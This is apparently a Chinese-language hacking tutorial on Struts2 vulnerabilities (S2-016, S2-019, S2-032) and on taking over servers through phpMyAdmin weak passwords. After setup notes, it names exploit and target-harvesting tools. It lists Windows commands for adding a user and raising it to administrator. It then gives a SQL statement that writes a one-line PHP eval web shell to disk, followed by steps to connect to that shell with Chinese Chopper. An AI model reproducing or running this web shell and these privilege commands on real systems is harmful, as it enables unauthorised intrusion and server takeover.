什麼是struts2?
Struts2是一個基於MVC設計模式的Web應用框架,它本質上相當於一個servlet,在MVC設計模式中,Struts2作爲控制器(Controller)來建立模型與視圖的數據交互。其被普遍應用於阿里、京東等各大網站。
本次講的struts2漏洞是什麼?
- S2-016
- S2-019
- S2-032
什麼是phpMyAdmin?
phpMyAdmin 是一個以PHP爲基礎,以Web-Base方式架構在網站主機上的MySQL的數據庫管理工具,讓管理者可用Web接口管理MySQL數據庫。
如何使用phpMyAdmin?
- 下載phpMyAdmin,這是官網連接
- 解壓並備份
- 找到config.sample.inc.php,改名爲config.inc.php,用文本編輯器打開該文件,找到下列代碼:
$cfg['blowfish_secret'] = ''改爲
$cfg['blowfish_secret'] = 'c4ca4238a0b923820dcc509a6f75849b';//一個長字符串密碼就行 - 進入apache的conf文件夾下,新建一個phpmyadmin.conf文件,文本編輯器打開,加入下列代碼:
Alias /phpmyadmin "c:/phpMyAdmin/" <Directory "c:/phpMyAdmin/"> Options Indexes FollowSymLinks MultiViews AllowOverride all Require all granted php_admin_value upload_max_filesize 128M php_admin_value post_max_size 128M php_admin_value max_execution_time 360 php_admin_value max_input_time 360 </Directory> - 在該文件夾內找到配置文件httdp.conf,用文本編輯器打開,在末尾增加一行
Include conf/phpmyadmin.conf
本次講的phpMyAdmin漏洞是什麼?
通過phpMyAdmin弱口令拿shell
本次使用的工具或方法是什麼?
- 工具:struts2漏洞利用工具、聽潮URL採集工具
- 方法:關鍵詞搜索(UPUPW)、弱口令、
本次使用了哪些命令?其作用是什麼?
| 命令 | 代碼 |
|---|---|
| 查看用戶 | net user |
| 新建用戶 | net user 123 123 /add |
| 提權 | localgroup administrators 123 /add |
| 刪除用戶 | net user 123 /del |
| 查看IP | ipconfig |
| 查看端口 | netstat -abn |
整理本次的***流程
- 利用弱口令進入phpMyAdmin後臺
- 在sql中輸入以下語句
SELECT '<?php @eval($_POST[xk]);?>' INTO OUTFILE 'D://upupw//htdocs//xk.php' - 利用菜刀連接
- 後續可利用小馬或者大馬完成***